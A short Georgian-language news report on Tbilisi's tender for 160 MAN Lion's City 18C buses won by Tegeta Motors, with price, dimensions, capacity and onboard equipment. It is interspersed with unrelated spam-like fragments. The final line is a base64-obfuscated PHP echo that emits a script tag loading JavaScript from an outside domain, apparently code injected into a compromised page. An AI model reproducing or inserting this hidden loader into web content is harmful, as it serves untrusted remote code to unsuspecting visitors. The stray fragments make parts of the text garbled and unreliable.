tube
ავერსი jaluzi

თბილისისთვის 18-მეტრიანი ავტობუსების შესაძენად ტენდერში გამარჯვებული გამოვლენილია.შესყიდვების სააგენტოზე ატვირთულია დოკუმენტები, რომლშიც ტრანსპორტის მახასიათებლებზეა ინფორმაცია მითითებული. 

ავტობუსების რაოდენობა - 160;
ერთეულის ფასი - 1 618 759 ლარი;
მწარმოებელი - MAN;
მოდელი - MAN Lion's City 18C;
გამძლეობა - 12 წელი და 1 020 000 კმ;
გამოშვების თარიღი - 2023 წელი;
სიგრძე - 18,06 მეტრი;
სიგანე - 2,55 მეტრი;
სიმაღლე - 3,34 მეტრი;
კარების რაოდენობა - 4 (შიდაგაღების ორფრთიანი);
იატაკი: მთლიან სამგზავრო სივრცეში იქნება დაბალი, გარდა ბორბლებისა და ძრავის სივრცეებისა;
ტევადობა: 162 მგზავრი (43 დასაჯდომი, მძღოლის ადგილი, 2 დასაკეცი სავარძელი, შშმ პირებისთვის 1 ეტლის ადგილი);
მაქსიმალური სიჩქარე - 80 კმ/სთ;
შესაძლებლობა: შეუძლია 18%-იან დახრილობაზე ასვლა;
ფერი: დამკვეთთან შედარებით სამ ფერში;

გათბობა-გაგრილება: ავტობუსს ექნება კონდიცირების სისტემა და შესაძლებელი იქნება ფანჯრების გახსნა;

ელექტრონული მოწყობილობები: WiFi (2 SIM სლოტი) - 100 მგზავრის წვდომის შესაძლებლობით, USB დამტენები, გამოცხადების სისტემა, საინფორმაციო დაფა.
ტენდერში გამარჯვებულია კომპანია "თეგეტა მოტორსი". მან სატენდერო ფასზე 1716 ლარით იაფად შესთავაზა მერიას ავტობუსი.

urbanway hybrid cng 18m 8 2580

669
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");